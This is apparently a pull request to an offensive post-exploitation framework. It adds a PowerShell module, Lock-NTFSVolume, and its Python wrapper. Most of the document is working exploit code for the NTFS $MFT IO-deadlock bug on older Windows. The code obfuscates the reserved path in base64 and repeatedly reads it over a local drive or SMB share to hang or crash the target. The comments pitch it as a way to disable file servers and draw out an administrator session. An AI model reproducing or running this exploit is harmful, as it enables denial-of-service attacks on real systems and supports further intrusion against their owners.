### PR TITLE
Adding admin_summon/Lock-NTFSVolume

### DIFF
--- a/data/module_source/admin_summon/Lock-NTFSVolume.ps1
+++ b/data/module_source/admin_summon/Lock-NTFSVolume.ps1
@@ -1,0 +1,100 @@
+function Lock-NTFSVolume {
+<#
+.SYNOPSIS
+
+Uses the NTFS $MFT vulnerability to IO deadlock a drive.
+https://arstechnica.com/information-technology/2017/05/in-a-throwback-to-the-90s-ntfs-bug-lets-anyone-hang-or-crash-windows-7-8-1/
+
+.DESCRIPTION
+
+$MFT is a reserved location within NTFS, which is not readable or writable directly.
+Attempting to read an arbitrary file from <ntfs_drive>:\$MFT\ will cause an IO
+deadlock that will never resolve. On non-system drives, it renders the drive
+inaccessible until a reboot. Done on a system drive, it will cause the system
+to progressively stack IO requests until the system either crashes or it is rebooted.
+This also works over SMB if the root drive is shared. (e.g. D$)
+
+.EXAMPLE
+
+Lock-NTFSVolume D:
+Lock-NTFSVolume \\FS1\share
+
+.NOTES
+
+USING THIS AGAINST AN EC2 INSTANCE WILL IRRECOVERABLY DOS IT. You've been warned.
+
+The current user must have read access to the drive or share.
+This is particularly effective when used against non-system drives of fileservers,
+as it will almost always cause an admin session to appear.
+
+Running this against the system drive will make the system unusable, including for
+your empire agent.
+
+#>
+
+    [CmdletBinding()] Param($RootPath)
+
+    $OSVersion = [Environment]::OSVersion.Version
+    $OSMajor = $OSVersion.Major
+
+    $mftpath = join-path $RootPath $([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("XCRNRlQ=")))
+    $pwnpath = join-path $RootPath $([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("XCRNRlRcMTIz")))   
+ 
+    if ($OSMajor -gt 6) {
+        "[!] This vulnerability only affects Windows < 8.1/2012 R2. Host is not vulnerable."
+    }
+
+    $isUNC = 1
+
+    if (($RootPath).indexOf("\\") -ne 0) {
+        $isUNC = 0
+        if ($RootPath.length -ne 2) {
+            "[!] RootPath should be precisely 2 characters if not UNC path (e.g. 'D:')."
+            return "Module failed."
+        }
+
+        $drive = $(Get-WMIObject win32_logicaldisk -filter "DeviceID = '$RootPath'")
+        if ($drive -eq $null) {
+            "[!] $RootPath does not exist."
+            return "Module failed."
+        }
+        
+        $fs = $drive.filesystem
+        if ("$fs" -ne "NTFS") {
+            "[!] $RootPath filesystem is not NTFS"
+            return "Module failed."
+        }
+    }
+
+    if ((Test-Path $mftpath) -eq 0) {
+        "[!] The provided path [$RootPath] is not accessible, does not exist, or is not the root of an NTFS volume."
+        return "Module failed."
+    }
+
+    "[*] Sanity checks passed. If execution hangs after this point, the exploit was successful and any interaction with $RootPath will deadlock."
+
+    if ($isUNC -eq 0) {
+        "[+] Triggering exploit with 'copy'"
+    } else {
+        "[*] Calling 'copy' in preparation for exploit"
+    }
+
+    Start-Process -FilePath "cmd" -Wait -WindowStyle Hidden -ArgumentList "/c","copy","/y",$pwnpath'*',$RootPath'\'
+    Start-Process -FilePath "cmd" -Wait -WindowStyle Hidden -ArgumentList "/c","copy","/y",$pwnpath,$RootPath'\'
+    Start-Process -FilePath "cmd" -Wait -WindowStyle Hidden -ArgumentList "/c","copy","/y",$pwnpath,$RootPath'\'
+    cmd /c copy $pwnpath $RootPath
+
+    if ($isUNC -eq 1) {
+        "[+] Triggering exploit with test-path. This may take a minute or two."
+        test-path $mftpath
+        start-sleep 10
+        "[*] - Triggering second attempt"
+        test-path $mftpath
+        start-sleep 10
+        "[*] - Triggering third attempt"
+        test-path $mftpath
+    }
+
+    "[!] Exhausted all methods but target is still responsive. Target does not appear vulnerable, but may have been rendered unstable anyway. Good luck."
+}
+

--- a/lib/modules/powershell/admin_summon/Lock-NTFSVolume.py
+++ b/lib/modules/powershell/admin_summon/Lock-NTFSVolume.py
@@ -1,0 +1,144 @@
+from lib.common import helpers
+
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # Metadata info about the module, not modified during runtime
+        self.info = {
+            # Name for the module that will appear in module menus
+            'Name': 'Lock-NTFSVolume',
+
+            # List of one or more authors for the module
+            'Author': ['@bradwoodwardio'],
+
+            # More verbose multi-line description of the module
+            'Description': ('This module will deadlock IO on an NTFS volume by attempting to'
+                            'read data from the $MFT reserved path of the associated volume.'
+                            'This attack works over UNC paths as well, assuming the target'
+                            'share points to the root of the NTFS volume and the current user'
+                            'has read access with their non-admin token. (Built in shares (C$)'
+                            'often won\'t work since they require admin tokens to access).'),
+
+            # True if the module needs to run in the background
+            'Background': True,
+
+            # File extension to save the file as
+            'OutputExtension': None,
+
+            # True if the module needs admin rights to run
+            'NeedsAdmin': False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe': False,
+
+            # The language for this module
+            'Language': 'powershell',
+
+            # The minimum PowerShell version needed for the module to run
+            'MinLanguageVersion': '2',
+
+            # List of any references/other comments
+            'Comments': [
+                'Affects: Windoes <= 8.1/Server 2012 R2',
+                'https://arstechnica.com/information-technology/2017/05/in-a-throwback-to-the-90s-ntfs-bug-lets-anyone-hang-or-crash-windows-7-8-1/'
+            ]
+        }
+
+        # Any options needed by the module, settable during runtime
+        self.options = {
+            # Format:
+            #   value_name : {description, required, default_value}
+            'Agent': {
+                'Description':   'Agent to run module on.',
+                'Required'   :   True,
+                'Value'      :   ''
+            },
+            'RootPath': {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description':   'UNC path or drive letter to target NTFS root (e.g. \\\\fs1\\share, D:).',
+                'Required'   :   True,
+                'Value'      :   'C:'
+            }
+        }
+
+        # Save off a copy of the mainMenu object to access external
+        #   functionality like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters are passed as
+        #   an object set to the module and the options dictionary is
+        #   automatically set. This is mostly in case options are passed on
+        #   the command line.
+        if params:
+            for param in params:
+                # Parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+
+        # The PowerShell script itself, with the command to invoke for
+        #   execution appended to the end. Scripts should output everything
+        #   to the pipeline for proper parsing.
+        #
+        # If you're planning on storing your script in module_source as a ps1,
+        #   or if you're importing a shared module_source, use the first
+        #   method to import it and the second to add any additional code and
+        #   launch it.
+        #
+        # If you're just going to inline your script, you can delete the first
+        #   method entirely and just use the second. The script should be
+        #   stripped of comments, with a link to any original reference script
+        #   included in the comments.
+        #
+        # First method: Read in the source script from module_source
+        moduleSource = self.mainMenu.installPath + "/data/module_source/admin_summon/Lock-NTFSVolume.ps1"
+        if obfuscate:
+            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
+            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+
+        moduleCode = f.read()
+        f.close()
+
+        # If you'd just like to import a subset of the functions from the
+        #   module source, use the following:
+        #   script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-Something", "Set-Something"])
+        script = moduleCode
+
+        # Second method: For calling your imported source, or holding your
+        #   inlined script. If you're importing source using the first method,
+        #   ensure that you append to the script variable rather than set.
+        #
+        # The script should be stripped of comments, with a link to any
+        #   original reference script included in the comments.
+        #
+        # If your script is more than a few lines, it's probably best to use
+        #   the first method to source it.
+        #
+        # script += """
+
+        scriptEnd = "Lock-NTFSVolume "
+
+        # Add any arguments to the end execution of the script
+        for option, values in self.options.iteritems():
+            if option.lower() != "agent":
+                if values['Value'] and values['Value'] != '':
+                    if values['Value'].lower() == "true":
+                        # if we're just adding a switch
+                        scriptEnd += " -" + str(option)
+                    else:
+                        scriptEnd += " -" + str(option) + " " + str(values['Value'])
+        #scriptEnd += "| Out-String | %{$_ + \"`n\"};"
+        #scriptEnd += "Lock-NTFSVolume Completed'"
+        script += scriptEnd
+        return script
+


### PR DESCRIPTION
This module exploits the $MFT IO deadlock vulnerability in Windows <= 8.1/2012 R2 to irrecoverably deadlock IO on a specified NTFS volume, either locally via drive letter, or remotely via UNC. Module verified functional against Windows 7, Windows Server 2008 R2, Windows Server 2012 R2.